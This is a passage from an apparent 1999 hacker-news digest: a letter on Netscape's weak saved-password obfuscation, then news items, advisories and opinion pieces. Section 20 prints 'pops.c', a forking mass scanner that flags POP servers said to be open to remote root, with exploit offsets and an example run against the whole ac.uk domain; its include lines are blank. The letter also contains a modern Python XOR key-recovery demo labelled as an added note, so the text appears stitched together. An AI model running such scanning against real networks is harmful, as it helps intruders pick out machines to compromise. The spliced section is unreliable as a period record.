So, to summarize so far, the cipher is exactly as complex as we said it was, and not "simpler than first thought". There's been some unfortunate confusion between their old cipher and their new one. It definitely would have been nice if we'd run across info on the old one before we talked to Netscape, or if they'd told us about it, but those things did not happen.

The next point I'd like to contend in today's HNN article is the quote "To Netscape's credit they are just conforming to the POP3 protocol which sends passwords in the clear anyway." First, the save password feature works w/ POP3 and IMAP. IMAP doesn't require you to send passwords in plaintext. If I recall correctly, there are a bunch of different authentication mechanisms. Of course, I don't know what NS uses or does not use. Second, I don't believe that just because a password is going to be sent in plaintext, you should make it even easier for people to get at it. Even if you can't raise the bar high enough that someone won't be able to jump it, you should raise the bar as high as you can.

Why didn't Netscape just leave the password lying around in plaintext? Well, even really poor obfuscation is going to stop most computer illiterates from getting the password. They'll find it if it's in plaintext (though someone might have to tell them it's there). At many companies, it'd be that much easier to get your boss' mail password, etc. just because he left himself logged in. So basic obfuscation raises the bar a bit. But script kiddies can download software to decrypt the old passwords (we haven't seen anyone post such software for the new algorithm yet). Also, it's not too hard to embed code to collect such passwords in email attachments that show dancing pigs.
In some older versions of Netscape, the password could be extracted remotely via JavaScript. For people who run both IE and Netscape, there is a current IE bug that will let people extract the ciphertext Netscape uses (Thanks to Richard Smith for that). More such holes might (probably) exist elsewhere.

I think that the more difficult you make this, the better, even if the password is sent over the network in plaintext. Why? Because it raises the bar a bit more. I believe that fewer people have the skills to set up a sniffer, and mine the data it produces than can run code to email back encrypted passwords, and then run code to decrypt them. Plus, there are tools like antisniff that can make it harder to sniff. Plus, you have to wait around for the person to actually check his mailbox from that machine (which he or she might not even use anymore). It's not a much bigger bar, true, but I believe it's a bit bigger nonetheless.

I've heard people argue that it is pointless for Netscape to use real encryption such as Twofish or 3DES and hide a key, because the key could be obtained through reverse engineering. Well, it's true that you could obtain the key that way. Again, I think it is a matter of raising the bar as high as you can. If you hide the key well, few people will be willing to go through the hassle of reverse engineering the code. Sure, it may eventually happen, but Netscape should hope that "eventually" at least buys them a little bit of time where they can really offer some security to people saving their passwords. There have been plenty of products that have gone several years with embedded keys that no one bothered to reverse engineer (at least, so far as the public knows). For most people, reverse engineering can be a huge time sink, and may not be worth the effort, especially when really good obfuscation is performed. There's generally always more interesting, lower hanging fruit to be picked.
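[Editor's note: the following is an added illustration, not part of John's letter and not Netscape's code or key. It models the "base 64 plus XOR with a fixed key" shape of the old scheme with a constructed toy key, and shows the property that makes any fixed-key XOR scheme obfuscation rather than encryption: because XOR is its own inverse, one known password/ciphertext pair gives back the key bytes it covers, and that key is the same in every copy of the program. The names and key bytes are made up for the example.]

```python
"""Toy fixed-key XOR 'password saver', constructed for illustration only.
Not Netscape's algorithm or key; the key below is an arbitrary example value."""
import base64

# Constructed example key. The weakness shown here does not depend on its value:
# any key embedded in a program is shared by every install of that program.
FIXED_KEY = b"\x3a\x51\x7c\x19\x66\x2d\x08\x5e"


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key (the key repeats if data is longer)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def obfuscate(password: str, key: bytes = FIXED_KEY) -> str:
    """The 'save password' transform: XOR with the fixed key, then base64."""
    return base64.b64encode(xor_with_key(password.encode(), key)).decode()


def deobfuscate(stored: str, key: bytes = FIXED_KEY) -> str:
    """Inverse transform, as the mail client itself would do it."""
    return xor_with_key(base64.b64decode(stored), key).decode()


def recover_key(known_password: str, stored: str) -> bytes:
    """Known-plaintext property of XOR: key = plaintext XOR ciphertext.
    One account whose password you already know (e.g. your own) yields
    as many key bytes as that password is long."""
    ct = base64.b64decode(stored)
    pt = known_password.encode()
    return bytes(p ^ c for p, c in zip(pt, ct))


def decode_with_fragment(key_fragment: bytes, stored_list):
    """Apply a recovered key fragment to other stored values. Only the bytes
    the fragment covers come back; longer passwords are truncated, which is
    why the example below recovers 'longerp' from 'longerpassword'."""
    out = []
    for s in stored_list:
        ct = base64.b64decode(s)
        n = min(len(ct), len(key_fragment))
        out.append(xor_with_key(ct[:n], key_fragment).decode(errors="replace"))
    return out


if __name__ == "__main__":
    mine = obfuscate("hunter2")          # a value I know the plaintext of
    frag = recover_key("hunter2", mine)  # 7 key bytes fall out immediately
    others = [obfuscate("secret"), obfuscate("longerpassword")]
    print(frag == FIXED_KEY[:7], decode_with_fragment(frag, others))
```

The takeaway for anyone designing a "remember my password" feature is that bit permutations and byte reversal on top of a fixed key do not change this picture: they are fixed transforms, so the same one-pair recovery works after undoing them. Secrecy has to come from something the program does not ship with, such as a key held by the operating system's credential store or derived from a user-supplied passphrase.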
I know that I sure wouldn't have bothered to reverse engineer Netscape's algorithm if we couldn't break it by other means, and I believe a lot of other people feel the same way.

Another sentiment I have heard a bit in the past couple of days is, "If you need access to run code on the machine for this exploit, who cares, since you've already compromised the machine?" Well, the primary response to this is that mail account info is often a quick gateway to other accounts on other machines. POP3 and IMAP accounts often check the same password file telnetd checks. Or, wu-ftpd, which you could use in conjunction w/ a recent buffer overflow to get a shell. Also, plenty of people use the same passwords for multiple accounts, PGP passphrases, whatever. They shouldn't, but they do anyway.

John

@HWA

14.0 Russian Politician Threatens Cyber Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by EvilWench

Russian politician, Vladimir Zhirinovsky, has threatened to electronically steal money from Western bank accounts. When asked what he would do to celebrate if he wins an upcoming parliamentary election the maverick politician announced that he would unleash computer viruses on the West and steal their money.

Reuters - via Excite
http://news.excite.com/news/r/991219/18/russia-election-zhirinovsky

Jubilant Zhirinovsky wants to hack Western computers

MOSCOW (Reuters) - Russia's maverick politician Vladimir Zhirinovsky, whose ultra-nationalist bloc looks set to do well in a parliamentary election, said Monday he would celebrate by hacking into Western computers.

Zhirinovsky's bloc was running at more than eight percent in early results compared with pre-election opinion polls which had given him some five percent. Asked by Reuters whether he would have a drink to mark his party's good showing, he said: "No. No way, we Russians don't drink any more.
We now work on computers, we use computers to send viruses to the West and then we poach your money."

"We have the best hackers in the world. We do not need to drink or smoke... we do not drink, smoke, have drugs and we don't have AIDS, that's what you have got in the West."

Russia is a heavy drinking nation which is struggling to catch up with economically-advanced countries on the use of new technologies, such as the Internet, but a lack of resources and poor infrastructure confines progress to big cities.

Zhirinovsky, who has run and done reasonably well in all parliamentary and presidential elections since 1991 on a protest vote by lower strata of the Russian society, is one of the most eccentric politicians with an acute political sense and bizarre sense of humour. He has thrown juice at an opponent in a live televised debate, promised to wash his boots in the Indian Ocean when Russia expands there and been involved in fist-fighting in the State Duma lower chamber of parliament. But at the same time, he has decided crucial votes in parliament in the Kremlin's favor and has developed a well organised party with solid assets.

@HWA

15.0 PCR-1000 Control Suite Released by Ghetto.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Javaman

After many hard hours of labor from Polywog and Javaman, Ghetto.org proudly releases its first mainstream product, the PCR-1000 Control Suite. The PCR-1000 is a wideband, PC-controlled receiver whose only decent control software was Win 9x/NT based. Because of Ghetto.org, there is now a *nix solution. Currently the code only compiles under Linux; they are seeking assistance in porting to other platforms.
Ghetto.org
http://www.ghetto.org

PCR-1000 Control Suite
http://www.ghetto.org/projects

@HWA

16.0 Nuclear Power Plant Y2K Readiness
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by ZapfDing

A little paranoid about Y2K and whether that nuke plant down the street is ready? The Nuclear Regulatory Commission has released an interesting PDF file that lists the Y2K transition period for all the nuclear power plants in the world in relation to EST and UTC.

Nuclear Regulatory Commission and Y2K
http://www.nrc.gov/NRC/NEWS/year2000.html

Global Y2K Plant Listing - PDF
http://www.nrc.gov/IP/Y2K/yewstz.pdf

@HWA

17.0 New E-zines Released
~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by 1k Resistor and sony_103

Digital Defiance has done it again and come out with their second issue. They continue to run head strong with articles on house arrest devices as well as their feature of the month of HiCards free phone cards. The Venezuelan magazine Hven ezine issue #2 has also been released. Yes, it is in Spanish.

Digital Defiance
http://digital-defiance.hypermart.net/zine.html

Hven ezine
http://www.hven.com.ve

@HWA

18.0 Digi.no publishes Script Kiddie Rant
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by aka

Respected online Norwegian news source Digi.no has published an interview with a member of the group "Hackers Online Norway" known as Spectom. The interview claims that the group is planning to enter the stock market and is looking for new members. Members must pass a test of knowledge and break into a site for membership. (It is unfortunate that a respected magazine such as Digi.no would publish what appears to be the rantings of a wannabe script kiddie.)

Digi.no - Norwegian
http://www.digi.no/digi98.nsf/pub/dd19991218113200TKW2126192111

Anyone want to send in a translation of this? - Ed

@HWA

19.0 w00w00 Con 1999
~~~~~~~~~~~~~~~

Contributed by Duro

w00giving99 is off to a great start.
In case you haven't heard, the w00 security development team is posting several vulnerabilities along with exploit code. It is said that on the year 2k they are going to release their best vulnerability along with the code to exploit it. The w00 team is up to #8 now. Check out http://www.w00w00.org/advisories.html for all of the advisories. The w00 team is doing this in the hopes that the vendors will fix the problem. In the mean time script kids have fun!

w00w00 Site: http://www.w00w00.org/

@HWA

20.0 pops.c popmail scanner by duro
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/* POPScan QPOP/UCB/SCO scanner by duro duro@dorx.net
   takes list of ip's from stdin

   The hosts gathered by this scanner are almost 100% vulnerable to a
   remote root attack. The exploits used to root the vulnerable machines
   can all be found by searching bugtraq. UCB pop is 100% of the time
   vulnerable to the qpop exploit (it's a very old version of qpop). The
   QPOP version is filtered to make sure that non-vulnerable versions do
   not show up in the scan.

   Common offsets for the bsd qpop exploit are: 621, 1500, 500, 300, 900, 0

   Example usage:
     ./z0ne -o ac.uk | ./pops > ac.uk.log &
   would scan ac.uk for vulnerabilities.

   much help from jsbach */

#include
#include
#include
#include
#include

int ADMtelnet (u_long, int port);

char domain[50];
int NUMCHILDREN = 150, currchilds = 0; /* change numchildren to taste */
char ip[16];
int temp1 = 0;

void scan(char *ip);

void alrm(void)
{
  return;
}

main()
{
  while( (fgets(ip, sizeof(ip), stdin)) != NULL)
    switch(fork()) {
      case 0: {
        scan(ip);
        exit(0);
      }
      case -1: {
        printf("cannot fork so many timez@!@^&\n");
        exit(0);
        break;
      }
      default: {
        currchilds++;
        if (currchilds > NUMCHILDREN)
          wait(NULL);
        break;
      }
    }
}

void scan(char *ip)
{
  char printip[16];
  struct sockaddr_in addr;
  int sockfd;
  char buf[512];

  bzero((struct sockaddr_in *)&addr, sizeof(addr));
  sockfd = socket(AF_INET, SOCK_STREAM, 0);
  addr.sin_addr.s_addr = inet_addr(ip);
  addr.sin_port = htons(110);
  addr.sin_family = AF_INET;
  signal(SIGALRM, alrm);
  alarm(5);
  if ( (connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) != -1)) {
    recv(sockfd, (char *)buf, sizeof(buf), 0);
    if ( (strstr(buf, "QPOP") ) != NULL && (strstr(buf, "2.5")) == NULL && (strstr(buf, "krb")) == NULL) {
      checkos(ip,1);
    }
    if((strstr(buf, "UCB")) != NULL)
      checkos(ip,2);
    if((strstr(buf, "SCO")) != NULL) {
      strcpy(printip, ip);
      if ((temp1=strrchr(printip, '\n')) != NULL)
        bzero(temp1, 1);
      printf("%s: SCO Unix box running SCO pop.\n",printip);
    }
  }
  return;
}
// }

checkos(char *ip, int spl)
{
  int temp2;
  char printip[16];
  unsigned long temp;

  temp = inet_addr(ip);
  temp2 = ADMtelnet(temp, 23);
  strcpy(printip, ip);
  if ((temp1=strrchr(printip, '\n')) != NULL)
    bzero(temp1, 1);
  if ((temp2 == 1)&&(spl==1)) printf("%s: OpenBSD box running vuln QPOP\n",printip);
  if ((temp2 == 1)&&(spl==2)) printf("%s: OpenBSD box running vuln UCB pop\n",printip);
  if ((temp2 == 2)&&(spl==1)) printf("%s: FreeBSD box running vuln QPOP\n",printip);
  if ((temp2 == 2)&&(spl==2)) printf("%s: FreeBSD box running vuln UCB pop\n",printip);
  if ((temp2 == 3)&&(spl==1)) printf("%s: BSDi box running vuln QPOP\n",printip);
  if ((temp2 == 3)&&(spl==2)) printf("%s: BSDi box running vuln UCB pop\n",printip);
}

int ADMtelnet (u_long ip, int port)
{
  struct sockaddr_in sin;
  u_char buf[4000];
  int dasock, len;
  int longueur = sizeof (struct sockaddr_in);

  dasock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); /* gimme a socket */
  sin.sin_family = AF_INET;
  sin.sin_port = htons (port);
  sin.sin_addr.s_addr = ip;
  if (connect (dasock, (struct sockaddr *) &sin, longueur) == -1)
    return (-1);
  while (1) {
    memset (buf, 0, sizeof (buf));
    if ((len = read (dasock, buf, 1)) <= 0)
      break;
    if (*buf == (unsigned int) 255) {
      read (dasock, (buf + 1), 2);
      if (*(buf + 1) == (unsigned int) 253 && !(u_char) * (buf + 2));
      else if ((u_char) * (buf + 1) == (unsigned int) 253) {
        *(buf + 1) = 252;
        write (dasock, buf, 3);
      }
    } else {
      if (*buf != 0) {
        bzero (buf, sizeof (buf));
        read (dasock, buf, sizeof (buf));
        usleep(40000);
        if((strstr(buf, "OpenBSD") != NULL)) return 1;
        if((strstr(buf, "FreeBSD") != NULL)) return 2;
        if((strstr(buf, "BSDI") != NULL)) return 3;
        sleep (1);
      }
    }
  }
  return 0;
}

@HWA

21.0 Cypherpunks meeting announcement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Join us for the first Cypherpunks meeting of the new millennium!

NEXT Meeting:
Meeting Page:

SF Bay Area Cypherpunks (80th Chairborne Regiment)
15 Jan 2000

* MEETING PRE-ANNOUNCEMENT

The January 2000 SF Bay Cypherpunks meeting will be on January 15th!

General Info: For those of you who plan ahead: the January 2000 cypherpunks physical meeting will be on January 15th, the THIRD SATURDAY of January, instead of the usual second Saturday. This will align our meeting with the RSA Data Security Conference in San Jose the following week (registration starts on 16 Jan). Many of the usual cypherpunk suspects from around the planet will be in town.

Location: The meeting will be held in San Jose, a few blocks from the RSA conference site. Location details to follow.

Time: Meeting time is 12-6pm, followed by a group dinner nearby from 6-8pm.

Speakers: (so far...)
  Cypherpunk Projects: general "Works-in-Progress" session
  Bruce Schneier (Counterpane)
  Austin Hill (Zero Knowledge)
  Paul Holman (Shmoo Group)
  Adam Shostack (Zero Knowledge)
  Mystery Guest
  More Volunteer Speakers are welcome: Send us your agenda proposal (one brief paragraph, include amount of time needed, e.g. 5/15/30 minutes).

RSA Conference Vendor Expo Free Registration

The show floor will be open January 18th and 19th at the San Jose Convention Center. Onsite Expo registration is $50, but it's FREE if you register NOW at: . Also, you can register for the conference or the IBM gala party at that site.

@HWA

22.0 Microsoft security bulletin MS99-046 Windows NT 4.0 SP4 or SP5
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is a Security Bulletin from the Microsoft Product Security Notification Service.

Please do not reply to this message, as it was sent from an unattended mailbox.

********************************

Re-release of Microsoft Security Bulletin MS99-046
--------------------------------------------------

In November, we withdrew a previously released patch that improved the randomness of TCP initial sequence numbers in Windows NT 4.0. The patch was withdrawn because it contained the same regression error that was present in Windows NT 4.0 SP6. We have eliminated the regression error and re-released the patch. The security bulletin has been updated and is available at http://www.microsoft.com/Security/Bulletins/ms99-046.asp; the FAQ also has been updated and is available at http://www.microsoft.com/Security/Bulletins/ms99-046faq.asp.

All versions of the original patch were affected by the regression error, although the error only manifested itself in certain situations. When applying the new patch, it's not necessary to uninstall the original patch first. Just install the patch as normal.
Here's how to determine which patch to apply:

- If you are running Windows NT 4.0 SP4 or SP5 on an Intel machine, go to http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16763 and select q243835sp5i.exe.
- If you are running Windows NT 4.0 SP6 on an Intel machine, go to http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16764 and select q243835i.exe.
- If you are running Windows NT 4.0 SP4 or SP5 on an Alpha machine, go to http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16763 and select q243835sp5a.exe.
- If you are running Windows NT 4.0 SP6 on an Alpha machine, go to http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16764 and select q243835a.exe.

We are very sorry for any inconvenience caused by the regression error, and will do our best to prevent similar problems in the future.

Regards,
The Microsoft Security Response Team

*******************************************************************

You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like.

For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/services/bulletin.asp. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security.

_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net

@HWA

23.0 [ISN] Hacker Shootouts?
~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: darek.milewski@us.pwcglobal.com

NETWORK WORLD FUSION FOCUS: JIM REAVIS on SECURITY
Today's Focus: Hacker shootouts? Not!
12/10/99

By Jim Reavis

I personally like the idea of companies sponsoring hacker challenges, where a box is set up on the 'Net for ingenious hackers to test their skills and win a prize. These challenges can be educational - for the hacker, the sponsor and sometimes for the product vendors as well. I would like to see more hacker challenges, bug bounties and crypto algorithm cracking contests.

However, it is completely irresponsible and unbelievable to see hacker shootouts that pit one operating system against another. Such was the case in September when PC Week Labs sponsored HackPCWeek.com, where a Windows NT server was pitted against a Linux server in a test to find which operating system was more secure. Unfortunately, these types of shootouts serve only to obfuscate the real issues of operating system security, confuse those trying to learn about the technical differences between the operating systems and further polarize the proponents of Linux and NT.

Four days after the challenge was initiated, the Linux system was compromised by an add-on CGI script with improper security checks - not by the core operating system. In providing an explanation of the hack, PC Week Labs revealed that they did not install any of the 21 security patches for Red Hat 6; however they did install Service Pack 5 for NT. Their reasoning? It was too difficult to install the individual patches, but Service Pack 5 comes in one easy file.

Their perverse reasoning could be described as defining deviancy down - systems administrators must be lazy and sloppy so we will be sloppy as well. PC Week Labs does not seem to be aware that service packs on NT are not necessarily a systems administrator's paradigm.
The service packs are very famous for fixing some things, but breaking others; consequently, many systems administrators are more comfortable staying behind a service pack level and utilizing post-SP hotfixes to take a more targeted approach to solving problems. It is clear from PC Week Labs' explanation of their setup rationale that service packs are an ideal service management solution - that would be news even to many NT advocates. PC Week Labs is guilty of making unwise generalizations about how either of the operating systems are or should be securely implemented.

So what did PC Week Labs prove? As many veterans of the computer security industry will say, you cannot prove security, only insecurity. Providing total systems assurance is a complicated process that cannot be emulated in a contest. When it comes to using any computer system for the purpose of securing sensitive data, the contribution the technology makes to that equation pales in comparison to the contribution the people must make. People make the difference in information security, and a solitary shootout will do more to establish the competency of the test developers, not the products themselves. Unfortunately, HackPCWeek.com proved very little.

What are good hacker challenges to conduct? Vendors that challenge hackers to find flaws in their own products, or very specific algorithms, are doing a positive thing. Microsoft, for one, should be applauded for the Windows 2000 beta test site the firm ran on its own. This is a terrific way to get the product out of their developers' and beta testers' hands and into those with the talents to hack NT's vulnerabilities. We only wish that this effort was more extensive and that Microsoft would have offered nice rewards to successful participants. Vulnerabilities found on a beta product in a hacker challenge are vulnerabilities that won't show up in the released product.
Code-breaking challenges like RSA's Data Encryption Standard challenge are enormously useful, as they give us concrete data on the amount of processing power required to crack a widely used crypto algorithm.

To be sure, vendors use marketing spin to claim that their own hacker challenge has proven the superiority of their own products, but we all know that vendors are supposed to be biased, and we can filter out the noise. However, contests from a presumably unbiased authority need to be much more carefully constructed, and need to have objective goals. Computer magazines have done competitive product reviews for a long time, and the accepted protocol is to bend over backwards to be fair. Subjectively patching one operating system, but not the other, is troubling and damaging to PC Week Labs' credibility.

There are many IT decision makers who want to get to the facts about which operating system they should be using now, and in the future. Facts are sometimes hard to come by, and unfortunately, a hacker shootout does not provide any facts. A hacker shootout serves only to further polarize the respective NT and Linux camps. Ultimately, HackPCWeek.com appears to be a base attempt to capitalize on the Linux-NT debate, without providing something useful for IT decision makers.

I personally want to see more hacker challenges. Nothing would please me more than to see talented hackers making a living off of these contests, while we all learn from the results.

What did we really learn from the HackPCWeek.com exercise? If you are looking to hire a Linux administrator and you receive a resume listing PC Week Labs as prior experience - you might want to pass.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
FOR RELATED LINKS -- Click here for Network World's home page:
http://www.nwfusion.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Getting the drop on network intruders, Network World, 10/04/99
http://www.nwfusion.com/reviews/1004trends.html

Hacker alert, Network World, 09/27/99
http://www.nwfusion.com/buzz99/buzzintel.html

Defending against cyberattack, Network World, 08/23/99
http://www.nwfusion.com/news/1999/0823cyberattack.html

Start-up's 'decoy' server helps track down hackers, Network World, 08/09/99
http://www.nwfusion.com/archive/1999/72100_08-09-1999.html

Archive of Network World Fusion Focus on Security newsletters:
http://www.nwfusion.com/newsletters/sec/

Other security-related articles from Network World:

Viruses to crash New Year's bash: Remedies include shutting down e-mail systems, Network World, 12/6/99
http://www.nwfusion.com/news/1999/1206y2k.html

Network World interview: Cisco's John Chambers, Network World, 12/6/99
http://www.nwfusion.com/news/1999/1206chambers.html

About the author
----------------
Jim Reavis, the founder of SecurityPortal.com (http://securityportal.com/), is an analyst with over 10 years' experience consulting with Fortune 500 organizations on networking and security-related technology projects.

Questions or comments?
----------------------
* For editorial comments, write Charley Spektor, Managing Editor at: cspektor@nww.com
* For advertising information, write Jamie Kalbach, Account Executive at: jkalbach@nww.com
* For all other inquiries, write Christine Rhoder, Circulation Marketing Manager at: crhoder@nww.com

Subscription Services
---------------------
You can subscribe or unsubscribe to any of your e-mail newsletters by updating your form at: http://www.nwfusion.com/focus/subscription.html

For subscription changes that cannot be handled via the web, please send an email to our customer service dept: listnews@gaeta.itwpub1.com

Network World Fusion is part of IDG.net, the IDG Online Network.
IT All Starts Here: http://www.idg.net

Copyright Network World, Inc., 1999

----------------------------------------------------------------

ISN is sponsored by Security-Focus.COM

@HWA

24.0 [ISN] 21 yr old secures $53Mil for high-tech startup
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.mercurycenter.com/svtech/news/breaking/merc/docs/004316.htm

PALO ALTO, Calif. (AP) [12.15.99] -- Angus Davis told his parents not to worry when he was thrown out of the prestigious school Phillips Academy Andover for hacking into the telephone system. But even Davis couldn't have predicted that in less than five years he would leverage his scofflaw talents to secure $53 million in funding for a company trying to combine the power of the World Wide Web with the convenience of the telephone.
On Wednesday Davis -- who is barely old enough to pop a bottle of champagne -- announced that he and his partners at their company, Tellme Networks Inc., have received $47 million in funding from rival venture capital firms Benchmark Capital and Kleiner Perkins Caufield & Byers. The new round of investment brings the company's total funding to $53 million.

``It's a lot of money,'' said Davis, 21, perched on the bed he has built above his desk. ``It's a testament to the importance of our team.''

[...]

==
Some day, on the corporate balance sheet, there will be an entry which reads, "Information"; for in most cases the information is more valuable than the hardware which processes it.
-- Adm. Grace Murray Hopper, USN Ret.
==
http://www.dis.org/erehwon/

ISN is sponsored by Security-Focus.COM

@HWA

25.0 [ISN] Netscape Security Flaw Revealed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: "John Q. Public"

http://www.zdnet.com/zdnn/stories/news/0,4586,2409537,00.html

By Sharon Cleary, WSJ Interactive Edition
December 15, 1999 5:50 AM PT

A software-security firm warned that its researchers have found a potentially serious security flaw in the e-mail system used by Netscape's Web browser.

Reliable Software Technologies, a Sterling, Va., software-security company, said Tuesday that two RST engineers needed just eight hours to duplicate the mathematical algorithm Netscape Mail uses to scramble users' passwords. The company said the problem affects all current versions of Netscape.

Gary McGraw, vice president for corporate technology at RST, said the Netscape algorithm was "not an obvious sitting duck -- [the password] appears to be scrambled up in a good way, but it's not cryptographically strong." That would allow a determined hacker to reverse-engineer the algorithm and figure out the password.

[...]

Officials of Netscape, now a division of Dulles, Va.-based America Online Inc.
(NYSE: AOL, were concerned by the news but said the unit has no plans to change its algorithm. [sic, bad parens]

Chris Saito, the senior director for product management at Netscape, said that the option to save a password locally was included for convenience. Saito added that Netscape didn't use a stronger encryption algorithm to protect passwords so that "computer experts could still access the information, in case someone forgot their password."

[snip]

ISN is sponsored by Security-Focus.COM

@HWA

26.0 [ISN] Cyberterrorism hype
~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: Johan.Ingles@janes.co.uk

http://jir.janes.com/sample/jir0525.html

Document created: 21 OCTOBER 1999

Cyberterrorism hype

With the 1990s propensity to dot.com everything that moves, 'hacking' and 'cyberterrorism' have become subjects of intense media coverage. Almost daily, hitherto unknown security specialists warn of potential catastrophes: news that gets picked up by the media and crosses the globe with impunity. Johan J Ingles-le Nobel discussed the subject with programmers at Slashdot to profile so-called cyberterrorists and examine the viability of cyberwarfare.

Cyberterrorism is a buzzword of 1999. Indeed, with the remarkable growth of the Internet, hacking horror stories have reached new heights of publicity, leading to a veritable media frenzy. Yet careful examination of the issue reveals much of the threat to be unsubstantiated rumour and media exaggeration. The exaggeration is understandable, however - these technologies underpin our entire society, and what paper can resist printing a scoop revealing that banks are being blackmailed with threats of attacks on their computers, or that a military satellite has been hijacked by hackers? The idea that an anonymous teenager working alone from his bedroom can wreak electronic havoc on the far side of the world makes for good press.

What is a hacker?

Nothing gets a hacker's back up quicker than someone confusing a hacker with cracker.
The term 'hacker' refers to an individual who programmes enthusiastically (even obsessively), enjoys programming or is especially good at programming; a 'cracker' is somebody who breaks into another's computer systems or digs into their code (to make a copy-protected programme run). Yet the boundaries have become somewhat blurred and the popular understanding of these terms is quite wrong: ever since Hollywood produced 'Wargames', based on Kevin Mitnick's cracking activities (known as 'exploits'), the term 'hacking' has become synonymous with unauthorised access into restricted systems - which is 'cracking'. In today's world, such activity also includes the deliberate defacement of websites.

Hackers are quick to point out that there is a code of hacker ethics that precludes any profit from the activity - the only motive is the activity itself - but they are not naïve: realising the potential for misuse, they divide themselves into 'white-hat' hackers (ethical hackers) and 'black-hat' hackers (crackers).

According to hackers, 99% of cracking incidents can be blamed on so-called 'script-kiddies'. These are usually young people who manage to acquire some 'cracking tools' somewhere on the Internet and are keen to try them. They choose a 'cool' target (such as NASA, the Pentagon or the White House) and launch the tools. Older, more established hackers see them as upstarts. Think of a kid walking down a corridor testing doorknobs; whilst they are more than capable of defacing websites such as that of the Central Intelligence Agency (CIA), their actions are seen as the equivalent of putting down a whoopie cushion on the chair of the UN Secretary General - juvenile, noisy and somewhat embarrassing, but ultimately without real effect. Says Mick Morgan, webmaster to the UK's Queen Elizabeth: "I have nightmares about waking up to find graffiti (which is all it is) on one of my customer's sites."

[snip..]
ISN is sponsored by Security-Focus.COM

@HWA

27.0 [ISN] The Beijing Hack Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.worldnetdaily.com/bluesky_exnews/19991216_xex_hack_planet.shtml

HONG KONG -- What do blondes, Jack in the Box tacos and 21st century cyber-warfare have in common? Everything, apparently, if you're one of the elite and stealthy soldiers in Hong Kong Blondes' computer hacking universe. These committed soldiers are locked in mortal combat with the government of the People's Republic of China and the transnational corporations who profit from dealing with it.

"Human rights are a global concern and we have no second thoughts about attacking the multinational corporations who profit off of the human rights abuses committed against our Chinese brothers and sisters by their own government," says Databyte Cowgirl, one of the leaders of the Hong Kong Blondes.

Along with numerous other members of the Hong Kong Blondes, Databyte Cowgirl was interviewed by WorldNetDaily over the course of seven weeks in July and August of 1999, as well as during the past several weeks.

[...]

==
Some day, on the corporate balance sheet, there will be an entry which reads, "Information"; for in most cases the information is more valuable than the hardware which processes it.
-- Adm. Grace Murray Hopper, USN Ret.
==
http://www.dis.org/erehwon/

ISN is sponsored by Security-Focus.COM

@HWA

28.0 [ISN] Most cybercrime goes unpunished
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.ntsecurity.net/forums/2cents//news.asp?IDF=191

WINDOWS SECURITY NEWS 12/20/99

Most Cybercrime Goes Unpunished

Monday, December 13, 1999 - According to a recent article by David Noack, most cybercrime goes unpunished. And based on the figures presented in this report, we have to agree. The report states that of 419 cases of alleged computer fraud referred to federal prosecutors in 1998, only 83 were prosecuted. The remainder were dismissed for lack of evidence.
Also in 1998, 47 people were convicted of federal computer crimes, and 20 were sent to prison; another 10 were found not guilty. Anyone who has glanced at the ATTRITION.ORG archives realizes that these figures are pathetically low compared to the number of computer crimes that actually occur every day. The report basically leads us to assume most computer crimes are never reported to authorities--and perhaps that's because most computer criminals never get caught.

Links:
APB News
http://www.apbnews.com/newscenter/internetcrime/1999/12/09/cyberlaws1209_01.html?s=snaph

ISN is sponsored by Security-Focus.COM

@HWA

29.0 [ISN] Jubilant Zhirinovsky wants to hack Western computers
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: "Vanna P. Rella"

http://biz.yahoo.com/rf/991219/dy.html

Sunday December 19, 5:19 pm Eastern Time

Jubilant Zhirinovsky wants to hack Western computers

MOSCOW, Dec 20 (Reuters) - Russia's maverick politician Vladimir Zhirinovsky, whose ultra-nationalist bloc looks set to do well in a parliamentary election, said on Monday he would celebrate by hacking into Western computers.

